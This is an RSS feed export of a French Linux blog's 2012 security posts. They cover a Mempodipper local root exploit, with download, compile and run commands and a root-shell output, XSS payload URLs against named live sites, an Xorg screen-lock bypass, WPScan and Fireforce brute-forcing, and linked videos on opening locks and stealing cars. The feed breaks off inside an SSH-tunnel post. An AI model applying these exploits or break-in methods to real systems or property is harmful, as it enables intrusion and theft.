<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Tux-planet &#187; sécurité</title>
	<atom:link href="http://www.tux-planet.fr/category/securite/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.tux-planet.fr</link>
	<description>Linux et les Logiciels Libres</description>
	<lastBuildDate>Tue, 07 Feb 2012 12:50:42 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Où acheter un masque des Anonymous ?</title>
		<link>http://www.tux-planet.fr/ou-acheter-un-masque-des-anonymous/</link>
		<comments>http://www.tux-planet.fr/ou-acheter-un-masque-des-anonymous/#comments</comments>
		<pubDate>Tue, 07 Feb 2012 11:29:49 +0000</pubDate>
		<dc:creator>pti-seb</dc:creator>
				<category><![CDATA[sécurité]]></category>
		<category><![CDATA[anonyme]]></category>
		<category><![CDATA[anonymous]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[masque]]></category>

		<guid isPermaLink="false">http://www.tux-planet.fr/?p=4844</guid>
		<description><![CDATA[Le mouvement des Anonymous est de plus en plus populaire ces derniers temps. Si vous souhaitez, vous aussi, acheter un masque et bien sachez qu'il y en a en vente un peu partout sur Internet, pour moins de 20€. Il semble néanmoins y avoir plusieurs types de qualité, donc plusieurs prix. A vous de faire [...]<p><br/><hr><a href="http://www.tux-planet.fr/ou-acheter-un-masque-des-anonymous/">Où acheter un masque des Anonymous ?</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter" src="/public/images/icons/anonymous.jpg" alt="Anonymous" /><br />
Le mouvement des <a href="http://fr.wikipedia.org/wiki/Anonymous_%28collectif%29">Anonymous</a> est de plus en plus populaire ces derniers temps. Si vous souhaitez, vous aussi, acheter un masque et bien sachez qu'il y en a en vente un peu partout sur Internet, pour moins de 20€. Il semble néanmoins y avoir plusieurs types de qualité, donc plusieurs prix. A vous de faire le bon choix.</p>
<p><span id="more-4844"></span></p>
<p><img class="aligncenter" src="/public/images/photos/informatique/hack/masque-anonymous.jpg" alt="Masque des anonymous" width="620" /></p>
<p>Voici quelques sites marchands qui en proposent :</p>
<ul>
<li><a href="http://www.amazon.fr/s/ref=nb_sb_noss?__mk_fr_FR=%C5M%C5Z%D5%D1&amp;url=search-alias%3Dtoys&amp;field-keywords=Masque+de+Guy+Fawkes&amp;x=0&amp;y=0">Amazon</a></li>
<li><a href="http://shop.ebay.fr/i.html?_from=R40&amp;_trksid=p4939.m570.l1313&amp;_nkw=Masque+de+Guy+Fawkes&amp;_sacat=See-All-Categories&amp;LH_PrefLoc=0">Ebay</a></li>
<li><a href="http://www.leboncoin.fr/annonces/offres/bretagne/occasions/?f=a&amp;th=1&amp;q=masque+anonymous">Le bon coin</a></li>
<li><a href="http://www.priceminister.com/offer/buy/121286785/masque-v-pour-vendetta-decoration.html">Priceminister</a></li>
</ul>
<p>Un petit rappel tout de même : il est interdit de manifester à visage couvert depuis le décret du 19 juin 2009, appelé "décret anti-cagoule". Une amende de 1 500 euros peut être infligée à toute personne qui dissimule son visage intentionnellement. Tous les détails de cette loi sont dans l’article R-645-14 du Code Pénal.</p>
<p><a href="http://www.geeek.org/anonymous-et-e-commerce-les-masques-de-guy-fawkes-429.html">Source</a></p><p><br/><hr><a href="http://www.tux-planet.fr/ou-acheter-un-masque-des-anonymous/">Où acheter un masque des Anonymous ?</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tux-planet.fr/ou-acheter-un-masque-des-anonymous/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Linux local root exploit via SUID</title>
		<link>http://www.tux-planet.fr/linux-local-root-exploit-via-suid/</link>
		<comments>http://www.tux-planet.fr/linux-local-root-exploit-via-suid/#comments</comments>
		<pubDate>Mon, 23 Jan 2012 22:25:50 +0000</pubDate>
		<dc:creator>pti-seb</dc:creator>
				<category><![CDATA[sécurité]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[root]]></category>

		<guid isPermaLink="false">http://www.tux-planet.fr/?p=4834</guid>
		<description><![CDATA[Un petit article rapide pour vous prévenir qu'une faille de sécurité circule en ce moment sur Internet. Celle-ci affecte les noyaux Linux dont la version est égale ou supérieure à la 2.6.39. Les versions récentes de Red Hat, Centos et Ubuntu sont concernées. Voici un exemple d'utilisation : $ wget www.tux-planet.fr/public/hack/exploits/kernel/mempodipper.c $ gcc mempodipper.c -o [...]<p><br/><hr><a href="http://www.tux-planet.fr/linux-local-root-exploit-via-suid/">Linux local root exploit via SUID</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter" src="/public/images/icons/black-hat.png" alt="Black Hat" /><br />
Un petit article rapide pour vous prévenir qu'une faille de sécurité circule en ce moment sur Internet. Celle-ci affecte les noyaux Linux dont la version est égale ou supérieure à la 2.6.39.<br />
<span id="more-4834"></span><br />
Les versions récentes de Red Hat, Centos et Ubuntu sont concernées. Voici un exemple d'utilisation :</p>
<blockquote><p>$ wget www.tux-planet.fr/public/hack/exploits/kernel/mempodipper.c<br />
$ gcc mempodipper.c -o mempodipper<br />
$ ./mempodipper<br />
===============================<br />
= Mempodipper =<br />
= by zx2c4 =<br />
= Jan 21, 2012 =<br />
===============================</p>
<p>[+] Waiting for transferred fd in parent.<br />
[+] Executing child from child fork.<br />
[+] Opening parent mem /proc/6454/mem in child.<br />
[+] Sending fd 3 to parent.<br />
[+] Received fd at 5.<br />
[+] Assigning fd 5 to stderr.<br />
[+] Reading su for exit@plt.<br />
[+] Resolved exit@plt to 0x402178.<br />
[+] Seeking to offset 0x40216c.<br />
[+] Executing su with shellcode.<br />
sh-4.2# whoami<br />
root</p></blockquote>
<p>Les explications techniques sont lisibles ici, en anglais :<br />
<a href="http://blog.zx2c4.com/749">http://blog.zx2c4.com/749</a></p><p><br/><hr><a href="http://www.tux-planet.fr/linux-local-root-exploit-via-suid/">Linux local root exploit via SUID</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tux-planet.fr/linux-local-root-exploit-via-suid/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
		<item>
		<title>Grosse faille de sécurité dans le serveur d&#039;affichage Xorg 1.11</title>
		<link>http://www.tux-planet.fr/grosse-faille-de-securite-dans-le-serveur-daffichage-xorg-1-11/</link>
		<comments>http://www.tux-planet.fr/grosse-faille-de-securite-dans-le-serveur-daffichage-xorg-1-11/#comments</comments>
		<pubDate>Thu, 19 Jan 2012 11:36:46 +0000</pubDate>
		<dc:creator>pti-seb</dc:creator>
				<category><![CDATA[sécurité]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[faille]]></category>
		<category><![CDATA[xorg]]></category>
		<category><![CDATA[xscreensaver]]></category>

		<guid isPermaLink="false">http://www.tux-planet.fr/?p=4831</guid>
		<description><![CDATA[Une très grosse faille de sécurité vient d'être découverte dans le serveur d'affichage Xorg (version &#62;= 1.11), utilisé par la plupart des distributions GNU/Linux. Une combinaison de touches spéciale permet de déverrouiller l'écran de veille, sans avoir besoin de renseigner le mot de passe. Les touches à utiliser sont Alt + Ctrl + * . [...]<p><br/><hr><a href="http://www.tux-planet.fr/grosse-faille-de-securite-dans-le-serveur-daffichage-xorg-1-11/">Grosse faille de sécurité dans le serveur d'affichage Xorg 1.11</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter" src="/public/images/icons/xorg.png" alt="Xorg" /><br />
Une très grosse faille de sécurité vient d'être <a href="http://permalink.gmane.org/gmane.comp.security.oss.general/6734">découverte</a> dans le serveur d'affichage Xorg (version &gt;= 1.11), utilisé par la plupart des distributions GNU/Linux. Une combinaison de touches spéciale permet de déverrouiller l'écran de veille, sans avoir besoin de renseigner le mot de passe.</p>
<p><span id="more-4831"></span></p>
<p><a href="/public/images/photos/informatique/linux/tux/suicide-tux.jpg" class="lightview" rel="gallery['4831']"><img class="aligncenter" src="/public/images/photos/informatique/linux/tux/suicide-tux-mini.jpg" alt="Linux se suicide" /></a></p>
<p>Les touches à utiliser sont <span class="shortcut">Alt</span> + <span class="shortcut">Ctrl</span> + <span class="shortcut">*</span> . Attention, il faut se servir du caractère étoile du pavé numérique pour que cela fonctionne. Côté technique, cette combinaison envoie tout simplement un signal qui fait un kill sur le processus d'économiseur d'écran.</p>
<p>J'ai pu tester cet exploit avec succès sur une Fedora 16 et l’économiseur d'écran Xscreensaver activé. Les versions que j'utilise sont les suivantes :</p>
<blockquote><p>$ rpm -qa | grep "xorg-x11-server-Xorg\|xscreensaver-base"<br />
xscreensaver-base-5.15-3.fc16.x86_64<br />
xorg-x11-server-Xorg-1.11.2-3.fc16.x86_64</p></blockquote>
<p>Cela devrait marcher aussi pour Debian Testing, Debian Sid, ainsi que dans Gentoo et Archlinux. En revanche, la faille ne fonctionne pas sous Ubuntu 11.10, car la version de Xorg est la 1.10 :</p>
<blockquote><p>$ Xorg -version<br />
X.Org X Server 1.10.4<br />
$ lsb_release -ds<br />
Ubuntu 11.10</p></blockquote>
<p>Bref, on critique souvent Windows &amp; Co pour ses failles de sécurité, mais là, je pense que GNU/Linux a fait très fort.</p><p><br/><hr><a href="http://www.tux-planet.fr/grosse-faille-de-securite-dans-le-serveur-daffichage-xorg-1-11/">Grosse faille de sécurité dans le serveur d'affichage Xorg 1.11</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tux-planet.fr/grosse-faille-de-securite-dans-le-serveur-daffichage-xorg-1-11/feed/</wfw:commentRss>
		<slash:comments>29</slash:comments>
		</item>
		<item>
		<title>Comment forcer un coffre-fort, un cadenas, une voiture... ?</title>
		<link>http://www.tux-planet.fr/comment-forcer-un-coffre-fort-un-cadenas-une-voiture/</link>
		<comments>http://www.tux-planet.fr/comment-forcer-un-coffre-fort-un-cadenas-une-voiture/#comments</comments>
		<pubDate>Mon, 16 Jan 2012 08:17:50 +0000</pubDate>
		<dc:creator>pti-seb</dc:creator>
				<category><![CDATA[sécurité]]></category>
		<category><![CDATA[cadenas]]></category>
		<category><![CDATA[coffre fort]]></category>
		<category><![CDATA[garage]]></category>
		<category><![CDATA[voiture]]></category>

		<guid isPermaLink="false">http://www.tux-planet.fr/?p=4826</guid>
		<description><![CDATA[Voici quelques techniques simples qui permettent de forcer l'ouverture d'un coffre-fort, d'une porte, d'un cadenas ou encore d'une voiture. Ces méthodes sont proposées ici à titre éducatif bien entendu.  Appliquez-les uniquement sur vos objets personnels, sinon vous risquez de finir en prison. Sommaire Comment ouvrir un coffre-fort électronique ? Comment ouvrir un garage de l'extérieur [...]<p><br/><hr><a href="http://www.tux-planet.fr/comment-forcer-un-coffre-fort-un-cadenas-une-voiture/">Comment forcer un coffre-fort, un cadenas, une voiture... ?</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter" src="/public/images/icons/ninja2.png" alt="Ninja" /><br />
Voici quelques techniques simples qui permettent de forcer l'ouverture d'un coffre-fort, d'une porte, d'un cadenas ou encore d'une voiture. Ces méthodes sont proposées ici à titre éducatif bien entendu.  Appliquez-les uniquement sur vos objets personnels, sinon vous risquez de finir en prison.<br />
<span id="more-4826"></span></p>
<h3>Sommaire</h3>
<ul>
<li><a href="#coffre">Comment ouvrir un coffre-fort électronique ?</a></li>
<li><a href="#garage">Comment ouvrir un garage de l'extérieur ?</a></li>
<li><a href="#porte">Comment ouvrir une porte fermée avec une chaîne coulissante ?</a></li>
<li><a href="#cadenas">Comment forcer un cadenas rond ?</a></li>
<li><a href="#vitre">Comment briser une vitre de voiture facilement ?</a></li>
<li><a href="#menottes">Comment se libérer de menottes en plastique ?</a></li>
<li><a href="#voiture">Comment ouvrir une voiture ?</a></li>
<li><a href="#carjacking">Comment voler une voiture avec une canette ?</a></li>
</ul>
<h3>Comment ouvrir un coffre-fort électronique ?<a name="coffre"></a></h3>
<p>Lorsque l'on voyage, on trouve souvent des coffres-forts électroniques à disposition dans les chambres d'hôtel. Ils permettent notamment de mettre à l’abri des objets de valeur.</p>
<p>Et bien, sachez qu'il existe une technique, appelée "Safe Bouncing", qui permet de les ouvrir sans connaître le code. Il suffit de taper sur le dessus du coffre et d'actionner l'ouverture en même temps :</p>
<p><iframe width="620" height="465" src="http://www.youtube.com/embed/eOdmMb90YEE?fs=1&#038;feature=oembed" frameborder="0" allowfullscreen></iframe></p>
<p>Une autre technique consiste à lâcher le coffre et actionner l’ouverture en même temps :</p>
<p><iframe width="620" height="465" src="http://www.youtube.com/embed/hhWQF14Jb9M?fs=1&#038;feature=oembed" frameborder="0" allowfullscreen></iframe></p>
<p>Le safe bouncing fonctionne en général sur les coffres-forts électroniques de bon marché et de milieu de gamme.</p>
<h3>Comment ouvrir un garage de l'extérieur ?<a name="garage"></a></h3>
<p>Vous avez perdu la télécommande de votre garage et vous êtes coincé à l'extérieur, et bien munissez-vous d'une longue tige métallique et actionnez le mécanisme à distance :</p>
<p><iframe width="620" height="465" src="http://www.youtube.com/embed/CMz1tXBVT1s?fs=1&#038;feature=oembed" frameborder="0" allowfullscreen></iframe></p>
<h3>Comment ouvrir une porte fermée avec une chaîne coulissante ?<a name="porte"></a></h3>
<p>Pour ouvrir une porte fermée à l'aide d'une chaîne, il suffit de se munir d'un élastique, d'accrocher celui-ci à la chaîne et de le relier à la poignée de la porte :</p>
<p><iframe width="620" height="465" src="http://www.youtube.com/embed/7INIRLe7x0Y?start=30&#038;fs=1&#038;feature=oembed" frameborder="0" allowfullscreen></iframe></p>
<h3>Comment forcer un cadenas rond ?<a name="cadenas"></a></h3>
<p>Certains modèles de cadenas peuvent-être forcés facilement. Voici un exemple avec un cadenas rond, il suffit de prendre une fine plaque métallique (ex : une canette de boisson gazeuse) et de se confectionner un outil spécial :</p>
<p><iframe width="620" height="465" src="http://www.youtube.com/embed/1eGxRQlWTrM?fs=1&#038;feature=oembed" frameborder="0" allowfullscreen></iframe></p>
<h3>Comment briser une vitre de voiture facilement ?<a name="vitre"></a></h3>
<p>Si vous avez un accident de voiture et que votre véhicule tombe à l'eau (on ne sait jamais, hein !), la pression de l'eau fera que vous ne pourrez pas ouvrir les portes. Seule solution, briser une vitre. Mais cela n'est pas forcément évident, même en y mettant beaucoup de force. Il existe une technique pourtant simple, il suffit d'utiliser un outil appelé <a href="http://www.amazon.com/dp/B000ZJYV9W/?tag=gmgamzn-20">Auto Center Punch</a>. Sinon, n'importe quel brise glace devrait aussi faire l'affaire.</p>
<p><em>PS : vous pouvez commencer la lecture à 2:00 minutes.</em></p>
<p><iframe width="620" height="349" src="http://www.youtube.com/embed/UZuZgSQZJ9g?start=120&#038;fs=1&#038;feature=oembed" frameborder="0" allowfullscreen></iframe></p>
<p>Cette vidéo explique également d'autres techniques pour survivre en cas d'immersion du véhicule.</p>
<h3>Comment se libérer de menottes en plastique ?<a name="menottes"></a></h3>
<p>Vous venez de faire une manifestation et la police a décidé de vous mettre, à tord,  des menottes en plastique ? Utilisez vos fesses pour vous libérer le plus simplement du monde :</p>
<p><iframe width="620" height="349" src="http://www.youtube.com/embed/F97t_vgN6NE?fs=1&#038;feature=oembed" frameborder="0" allowfullscreen></iframe></p>
<h3>Comment ouvrir une voiture ?<a name="voiture"></a></h3>
<p>Une technique qui utilise une grande barre de métal vous permet d'ouvrir une voiture :</p>
<p><iframe width="620" height="465" src="http://www.youtube.com/embed/M0v6O-sFl_g?start=60&#038;fs=1&#038;feature=oembed" frameborder="0" allowfullscreen></iframe></p>
<h3>Comment voler une voiture avec une canette ?<a name="carjacking"></a></h3>
<p>Le meilleur pour la fin, comment voler une voiture avec une canette :</p>
<p><iframe width="620" height="465" src="http://www.youtube.com/embed/0kU5RUdDOto?fs=1&#038;feature=oembed" frameborder="0" allowfullscreen></iframe></p>
<p><a href="http://lifehacker.com/5873829/top-10-ways-to-break-into-and-out-of-almost-anything">Source</a></p><p><br/><hr><a href="http://www.tux-planet.fr/comment-forcer-un-coffre-fort-un-cadenas-une-voiture/">Comment forcer un coffre-fort, un cadenas, une voiture... ?</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tux-planet.fr/comment-forcer-un-coffre-fort-un-cadenas-une-voiture/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Fireforce : attaque par brute force sous Firefox</title>
		<link>http://www.tux-planet.fr/fireforce-attaque-par-brute-force-sous-firefox/</link>
		<comments>http://www.tux-planet.fr/fireforce-attaque-par-brute-force-sous-firefox/#comments</comments>
		<pubDate>Thu, 15 Dec 2011 11:30:26 +0000</pubDate>
		<dc:creator>pti-seb</dc:creator>
				<category><![CDATA[sécurité]]></category>
		<category><![CDATA[extensions]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[mozilla]]></category>

		<guid isPermaLink="false">http://www.tux-planet.fr/?p=4254</guid>
		<description><![CDATA[Fireforce est une nouvelle extension Firefox qui permet de mettre en place des attaques par brutes forces, sur des formulaires envoyés en GET ou en POST. Les combinaisons de mots de passes peuvent être basées sur des dictionnaires ou alors générées en fonction de plusieurs types de caractères. Fireforce pourra servir, par exemple, pour tester [...]<p><br/><hr><a href="http://www.tux-planet.fr/fireforce-attaque-par-brute-force-sous-firefox/">Fireforce : attaque par brute force sous Firefox</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter" src="/public/images/icons/fireforce.png" alt="Fireforce" /><br />
<a href="http://www.scrt.ch/attaque/telechargements/fireforce">Fireforce</a> est une nouvelle extension Firefox qui permet de mettre en place des attaques par brutes forces, sur des formulaires envoyés en GET ou en POST. Les combinaisons de mots de passes peuvent être basées sur des dictionnaires ou alors générées en fonction de plusieurs types de caractères.</p>
<p><span id="more-4254"></span></p>
<p><a href="/public/images/screenshots/software/firefox/fireforce.jpg" class="lightview" rel="gallery['4254']" title="Brute Force avec Firefox"><img class="aligncenter" src="/public/images/screenshots/software/firefox/fireforce-mini.jpg" alt="Brute Force avec Firefox" /></a></p>
<p>Fireforce pourra servir, par exemple, pour tester la fiabilité de son login/password, ou encore tester la sécurité de son site Internet. Cerise sur le gâteau, l'extension est distribuée sous la licence libre GPLv3.</p>
<p>Vous pouvez télécharger et installer Firefoce en cliquant sur <a href="http://www.scrt.ch/outils/fireforce/fireforce.xpi">ce lien</a> (32 Ko).</p>
<p><em>Note : chez moi cette extension fait ramer énormément ma machine.</em></p><p><br/><hr><a href="http://www.tux-planet.fr/fireforce-attaque-par-brute-force-sous-firefox/">Fireforce : attaque par brute force sous Firefox</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tux-planet.fr/fireforce-attaque-par-brute-force-sous-firefox/feed/</wfw:commentRss>
		<slash:comments>20</slash:comments>
		</item>
		<item>
		<title>WPScan : un scanner de vulnérabilité pour WordPress</title>
		<link>http://www.tux-planet.fr/wpscan-un-scanner-de-vulnerabilite-pour-wordpress/</link>
		<comments>http://www.tux-planet.fr/wpscan-un-scanner-de-vulnerabilite-pour-wordpress/#comments</comments>
		<pubDate>Thu, 01 Dec 2011 06:00:26 +0000</pubDate>
		<dc:creator>pti-seb</dc:creator>
				<category><![CDATA[sécurité]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[faille]]></category>
		<category><![CDATA[scanner]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.tux-planet.fr/?p=4792</guid>
		<description><![CDATA[WPScan est un scanner de vulnérabilité pour WordPress, écrit en ruby et diffusé sous la licence GPL. Il est capable de lister les plugins utilisés par un site web et de vous donner les failles de sécurité associées. Vous pouvez également faire de la brute force sur l'interface d'administration. Pour installer WPScan sur une distribution [...]<p><br/><hr><a href="http://www.tux-planet.fr/wpscan-un-scanner-de-vulnerabilite-pour-wordpress/">WPScan : un scanner de vulnérabilité pour WordPress</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></description>
			<content:encoded><![CDATA[<p><img src="/public/images/icons/wordpress-paper.png" alt="Wordpress Paper" class="aligncenter" /><br />
<a href="http://code.google.com/p/wpscan/">WPScan</a> est un scanner de vulnérabilité pour WordPress, écrit en ruby et diffusé sous la licence <acronym title="GNU General Public License">GPL</acronym>. Il est capable de lister les plugins utilisés par un site web et de vous donner les failles de sécurité associées. Vous pouvez également faire de la brute force sur l'interface d'administration.</p>
<p><span id="more-4792"></span></p>
<p><img src="/public/images/screenshots/software/wordpress/wordpress-space.jpg" alt="Wordpress Space" class="aligncenter" /></p>
<p>Pour installer WPScan sur une distribution à base de Debian, ouvrez un terminal en root et lancez les commandes suivantes :</p>
<blockquote><p>
sudo apt-get install ruby libcurl4-gnutls-dev libopenssl-ruby rubygems subversion<br />
sudo gem install typhoeus xml-simple
</p></blockquote>
<p>Ou pour une distribution à base de <acronym title="Red Hat Package manager">RPM</acronym> :</p>
<blockquote><p>
yum install ruby rubygem-xml-simple rubygem-typhoeus subversion
</p></blockquote>
<p>Ensuite, il faut récupérer le code source depuis le dépôt <acronym title="Subversion">SVN</acronym> officiel :</p>
<blockquote><p>
svn checkout http://wpscan.googlecode.com/svn/trunk/ ./wpscan<br />
cd wpscan
</p></blockquote>
<p>Pour finir, voici quelques exemples d'utilisation.</p>
<p>Lancer un simple audit :</p>
<blockquote><p>
ruby ./wpscan.rb --url www.example.com
</p></blockquote>
<p>Faire de la brute force sur l'interface d'administration, en utilisant un fichier de dictionnaire :</p>
<blockquote><p>
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin
</p></blockquote>
<p>Lister les plugins utilisés sur un site et afficher les failles de sécurité en relation :</p>
<blockquote><p>
ruby ./wpscan.rb --url www.example.com --enumerate p
</p></blockquote><p><br/><hr><a href="http://www.tux-planet.fr/wpscan-un-scanner-de-vulnerabilite-pour-wordpress/">WPScan : un scanner de vulnérabilité pour WordPress</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tux-planet.fr/wpscan-un-scanner-de-vulnerabilite-pour-wordpress/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Une faille XSS dans WordPress 3.1 et 3.2.1</title>
		<link>http://www.tux-planet.fr/une-faille-xss-dans-wordpress-3-1-et-3-2-1/</link>
		<comments>http://www.tux-planet.fr/une-faille-xss-dans-wordpress-3-1-et-3-2-1/#comments</comments>
		<pubDate>Fri, 26 Aug 2011 18:43:31 +0000</pubDate>
		<dc:creator>pti-seb</dc:creator>
				<category><![CDATA[sécurité]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.tux-planet.fr/?p=4695</guid>
		<description><![CDATA[Une vulnérabilité vient d'être découverte dans les dernières versions de WordPress. Il s'agit d'une faille de type XSS présente dans la fonction de recherche et qui affecte certains thèmes uniquement. Pour contrer ce type d’attaque, la solution est de modifier le code du fichier search.php. Voici deux exemples d'utilisation. Pour WordPress version 3.2.1 : http://www.futurefisherman.org/?s=%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E%22%3E [...]<p><br/><hr><a href="http://www.tux-planet.fr/une-faille-xss-dans-wordpress-3-1-et-3-2-1/">Une faille XSS dans WordPress 3.1 et 3.2.1</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></description>
			<content:encoded><![CDATA[<p><img src="/public/images/icons/wordpress-paper.png" alt="Wordpress Paper" class="aligncenter" /><br />
Une vulnérabilité vient d'être découverte dans les dernières versions de WordPress. Il s'agit d'une faille de type <acronym title="Cross-Site Scripting">XSS</acronym> présente dans la fonction de recherche et qui affecte certains thèmes uniquement. Pour contrer ce type d’attaque, la solution est de modifier le code du fichier search.php.</p>
<p><span id="more-4695"></span></p>
<p><a href="/public/images/photos/informatique/hack/i-am-a-hacker.jpg" class="lightview" rel="gallery['4695']"><img src="/public/images/photos/informatique/hack/i-am-a-hacker-mini.jpg" alt="I'm a hacker" class="aligncenter" /></a></p>
<p>Voici deux exemples d'utilisation. Pour WordPress version 3.2.1 :</p>
<blockquote>
<p>http://www.futurefisherman.org/?s=%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E%22%3E</p>
</blockquote>
<p>Et pour WordPress 3.1 : </p>
<blockquote>
<p>http://blogs.comodo.com/?s=%3Cimg%20src=http://www.tux-planet.fr/public/hack/images/no-permission.jpg%20align=center%3E</p>
</blockquote>
<p>Si vous êtes vulnérable à cette faille, voici une solution donnée par <a href="http://aryo.fr/2011/08/faille-xss-dans-certains-themes-wordpress/">Aryo</a> :</p>
<ol>
<li>Allez dans "Apparence &gt; Editeur" dans l’administration <acronym title="WordPress">WP</acronym></li>
<li>Choisissez "Résultats de recherche (search.php)"</li>
<li>Trouvez la ligne qui correspond à l’affichage de la requête. Par exemple "Résultat de la recherche pour "&lt;?php echo $s; ?&gt;"</li>
<li>On aperçoit qu’en effet, l’affichage n’est pas protégé, alors on s’en charge. Remplacez &lt;?php echo $s; ?&gt; par &lt;?php echo htmlspecialchars($s); ?&gt;</li>
<li>Vérifiez que la faille n’est plus exploitable</li>
</ol>
<p><a href="http://st2tea.blogspot.com/2011/08/wordpress-31-321-cross-site-scripting.html">Source</a></p><p><br/><hr><a href="http://www.tux-planet.fr/une-faille-xss-dans-wordpress-3-1-et-3-2-1/">Une faille XSS dans WordPress 3.1 et 3.2.1</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tux-planet.fr/une-faille-xss-dans-wordpress-3-1-et-3-2-1/feed/</wfw:commentRss>
		<slash:comments>14</slash:comments>
		</item>
		<item>
		<title>Surf anonyme sur Internet avec un tunnel SSH</title>
		<link>http://www.tux-planet.fr/surf-anonyme-sur-internet-avec-un-tunnel-ssh/</link>
		<comments>http://www.tux-planet.fr/surf-anonyme-sur-internet-avec-un-tunnel-ssh/#comments</comments>
		<pubDate>Thu, 30 Jun 2011 19:02:40 +0000</pubDate>
		<dc:creator>pti-seb</dc:creator>
				<category><![CDATA[sécurité]]></category>
		<category><![CDATA[Serveurs]]></category>
		<category><![CDATA[anonyme]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[serveur]]></category>
		<category><![CDATA[ssh]]></category>

		<guid isPermaLink="false">http://www.tux-planet.fr/?p=4656</guid>
		<description><![CDATA[Dans cet article, nous allons voir comment l'utiliser un tunnel SSH, afin de surfer anonymement sur Internet. Les connexions étant chiffrées, aucun tiers (fournisseur d'accès Internet, administrateur réseau d'une entreprise...) ne pourra analyser votre trafic réseau. Une bonne façon de préserver votre anonymat et déjouer les tentatives d'espionnage. Sommaire Fonctionnement Installation et configuration du serveur [...]<p><br/><hr><a href="http://www.tux-planet.fr/surf-anonyme-sur-internet-avec-un-tunnel-ssh/">Surf anonyme sur Internet avec un tunnel SSH</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></description>
			<content:encoded><![CDATA[<p><img src="/public/images/icons/anonymous.png" alt="Anonymous" class="aligncenter" /><br />
Dans cet article, nous allons voir comment l'utiliser un tunnel <acronym title="Secure Shell">SSH</acronym>, afin de surfer anonymement sur Internet. Les connexions étant chiffrées, aucun tiers (fournisseur d'accès Internet, administrateur réseau d'une entreprise...) ne pourra analyser votre trafic réseau. Une bonne façon de préserver votre anonymat et déjouer les tentatives d'espionnage.</p>
<p><span id="more-4656"></span></p>
<h3>Sommaire</h3>
<ul>
<li><a href="#fonctionnement">Fonctionnement</a></li>
<li><a href="#serveur">Installation et configuration du serveur</a></li>
<li><a href="#linux">Configuration d'un client Linux</a></li>
